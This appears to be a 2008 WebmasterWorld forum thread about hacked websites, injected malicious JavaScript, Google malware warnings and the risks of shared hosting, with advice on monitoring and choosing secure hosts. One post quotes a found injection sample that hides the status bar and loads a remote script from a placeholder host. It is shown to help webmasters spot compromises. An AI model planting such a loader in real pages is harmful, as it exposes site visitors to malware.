Forum Moderators: open
What's that in my Website Code?
You wake up this morning and you find some unusual JavaScript being inserted into your pages. You haven't looked at the source in a while so this is new to you. Then you do some advanced site: searches in Google and you notice that there is a Malware/Spyware warning attached to your SERPs. What?!?!?! you say. How did that happen?
Over the past few years I've become more in tune with the technical side of things and how all of that can have a dramatic impact on your SEO campaigns. If your site is doing well for a fairly competitive set of terms in an industry that is most likely to be targeted by undermining competitors (sleeze as some refer to them), you are open to a variety of technical exploits, believe me, it happens everyday and I don't care what anyone tells me, it has a direct impact on your campaign. "There is almost nothing a competitor can do to harm your site."
So, is your Website Host to be Trusted with your SEO?
Really? If I were you, I'd be investigating your hosting environment a little more carefully. There are tools out there that will allow you to see various information about your host that will help you determine at least some of the issues you may be faced with. I surely wouldn't feel comfortable sharing an IP with someone I didn't know and, that is going to happen with many. These days, if you are serious about this stuff, your hosting environment needs to be locked down, secure and trusted. If you are sitting there on a shared IP and a small percentage of others on that IP have also been compromised, how secure or trusted is that?
How frequently does this happen? Oh, I think we'd be surprised at the numbers, they are far greater than you think at the moment. If you search WebmasterWorld for topics where members are discussing their servers being compromised, the numbers are fairly large and should be of major concern for anyone doing SEO. Here are just a few that I grabbed from a random search...
My Server has been Compromised
2008-02-25 - Sites have been hacked
[webmasterworld.com...]
2008-02-23 - Virus in my website code?
[webmasterworld.com...]
2007-12-07 - Site hacked, what can I do?
[webmasterworld.com...]
2007-09-21 - Pages on site being compromised
[webmasterworld.com...]
2007-06-15 - Malicious Javascript On My Site
[webmasterworld.com...]
2005-12-20 - Code inserted into web page
[webmasterworld.com...]
They go all the way back to the beginning of WebmasterWorld and before then. You would think that many of these holes would have been patched by now and they probably are, but users haven't upgraded their platforms and/or installed the latest security patches, etc. The list of ongoing maintenance to keep a server secure and trusted is a long one.
If you are a WebmasterWorld Supporter, there is an excellent topic right now (in The Wall) concerning a group that has just released a tool that turns Google into a vulnerability scanner, some pretty intense stuff.
Do you feel safe in your hosting environment? On a scale of 1-10, how safe do you really feel?
Price alone isn't a guarantee of security. A couple of years ago, I had several sites on shared hosting get defaced after a server was exploited. This host was actually one of the most expensive (for shared hosting) that I used, but apparently their tech skills weren't up to snuff. After the same thing happened a couple of weeks in a row, I moved all of the sites I had hosted there.
In that case, if the hacker had just slipped in a spurious link or two instead of simply defacing the site, it might have been a while before anyone noticed.
Best way to choose a host: get recommendations from savvy webmasters with at least a year or two of experience with a host.
[edited by: rogerd at 6:24 pm (utc) on Feb. 25, 2008]
In that case, if the hacker had just slipped in a spurious link or two instead of simply defacing the site, it might have been a while before anyone noticed.
Google will notice...
How can I find out if my site has been identified as a web site that hosts or distributes malicious software and what can I do if it has?
[google.com...]
Google uses its own criteria, procedures, and tools to identify sites that host or distribute badware. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. If you feel your site has been mistakenly identified, or if you make changes to your site so that it no longer hosts or distributes malicious software and you secure your site so that it is no longer vulnerable to the insertion of badware, you can request that your site be reviewed.
Emphasis mine above. Here is a previous topic discussing Trusted Hosting Environments from 2006-04-23, you can skip the .gov and .edu intro, the rest applies to this topic.
THE - Trusted Hosting Environments
Are you at risk in your current hosting situation?
[webmasterworld.com...]
In the past couple of years, I've come across more than a handful of instances where there was malicious code on someone's website. A quick view of the source and some of it is rather easy to identify. Many of the examples I came across sat right at the bottom of the html somewhere, at times, right after the closing </html> element. Or, there were a few lines added to an external js file, those are the ones you really need to look for. And, if you are not familiar with JavaScript, find someone who is. Use the tools available to you for scanning, validating, etc. to make sure your house is secure.
Here is one example I found during a review of a site...
[red]<SCRIPT language=javascript>
kstatus();
function kstatus(){
self.status=" ";
setTimeout('kstatus()',0);
}
</SCRIPT>
<script language="javascript" src="http://example.com/lr.js"></script>[/red] That little script invoked some sort of ActiveX prompt when visiting those sites that contained it. The script was within an <iframe> on some obscure ccTLD (and even .com's) and had some pretty hefty encryption attached to it. I would imagine it was rather damaging to the visitor, or it tried to be. Most of the basic browser security settings are going to catch "some of these" but, "not all of them".
Its nice to see Google being Proactive in this area. They've realized that it is a major area of concern and have gone out of their way to clearly label those sites in the SERPs that may be potential malicious software distribution points. Is your site one of them?
Now I am going to be unable to sleep nights!
I don't want to cause any sort of panic. Its just something that many "SEO's" are not going to think about. They are "assuming" that the provider they've chosen is on top of all this and has provided a trusted and secure hosting environment for you and the others. As I mentioned in my opening post, you can do all the SEO by the book and a flaw and/or, multiple flaws at the server make it moot.
A friend has also had some of his sites pages modified, were links to adult sites were added in his footer.
I've had my AdWords account suspended a couple of times when Google discovered "malware" - which embarassingly turned out to be scripts that I myself put in place for my own custom analytics. Sure it's annoying, but it's also comforting to know that G is looking out for my user's best interests.
Security is a constant, ongoing PITA.
What you need to do is be proactive and use automated monitoring tools to check your website for page changes, especially the home page.
There are some free online services, paid services and software you can download that perform this function. I'd recommend just like with server alarm monitoring that you use at least 2 different page content monitoring services just in case one is unable to access your server.
If you can get in and correct the problem before Google crawls the page again your SEO is safe.
I believe my Host rates a 10 because they are always upgrading their hardware and software to keep ahead of potential problems. I have over 20 clients with each on their own dedicated IP address with no problems.
In a shared hosting environment, whether or not your HOST is making your site secure by upgrading isn't always as important as all of the sites on that server upgrading as well. All it takes is one WordPress or Joomla! site being hacked for the hackers to discover if they can escalate privileges and own the box.
Hopefully the hackers can just own the single hacked account, but I've seen too many servers and hosting companies completely hacked to give me any doubts one mistake is all it takes.
[edited by: incrediBILL at 12:39 am (utc) on Mar. 10, 2008]
I've never had any problems with my host other than that incident. But that situation has prompted me to lock down my server's firewall with blocking ssh & ftp ports to anyone but myself.
I'm going to go out on a limb and say he got in a bit of trouble because of my complaint.. I was dumb and trusted my host too much. I didn't change the root password after dealing with them. I will assume he wrote it down and connected once he got home and did his deed.
To me, it's no different than one of my employees going verbally crazy on a customer for complaining about something they did (after running to them into a mall or something.. how can I control what they do outside of work?). So until it happens again, I will shrug it off as a one-time, unfortunate event.. that taught me a valuable lesson.